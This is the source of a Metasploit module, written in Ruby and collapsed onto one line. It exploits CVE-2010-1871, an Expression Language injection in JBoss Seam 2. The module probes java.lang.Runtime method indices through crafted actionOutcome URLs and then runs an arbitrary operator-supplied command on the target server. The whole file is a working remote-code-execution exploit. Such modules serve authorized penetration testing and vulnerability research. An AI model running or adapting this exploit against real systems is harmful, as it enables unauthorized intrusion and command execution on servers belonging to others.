## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss Seam 2 Remote Command Execution', 'Description' => %q{ JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. This modules also has been tested successfully against IBM WebSphere 6.1 running on iSeries. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured. }, 'Author' => [ 'guerrino di massa', # Metasploit module 'Cristiano Maruti ' # Support for IBM Websphere 6.1 ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2010-1871' ], [ 'OSVDB', '66881'] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2010')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']), OptString.new('CMD', [ true, "The command to execute."]) ], self.class) end def run uri = normalize_uri(target_uri.to_s) cmd_enc = "" cmd_enc << Rex::Text.uri_encode(datastore["CMD"]) flag_found_one = 255 flag_found_two = 255 uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[" uri_part_3 = "].invoke(null),'" 25.times do |index| req = uri + uri_part_1 + index.to_s + "]}" res = send_request_cgi( { 'uri' => req, 'method' => 'GET', }, 20) if (res and res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29)) flag_found_one = index print_status("Found right index at [" + index.to_s + "] - exec") elsif (res and res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime)) print_status("Found right index at [" + index.to_s + "] - getRuntime") flag_found_two = index else print_status("Index [" + index.to_s + "]") end end if (flag_found_one != 255 && flag_found_two != 255 ) print_status("Target appears VULNERABLE!") print_status("Sending remote command:" + datastore["CMD"]) req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}" res = send_request_cgi( { 'uri' => req, 'method' => 'GET', }, 20) if (res and res.headers['Location'] =~ %r(pwned=java.lang.UNIXProcess)) print_status("Exploited successfully") else print_status("Exploit failed.") end else print_error("Target appears not vulnerable!") end end end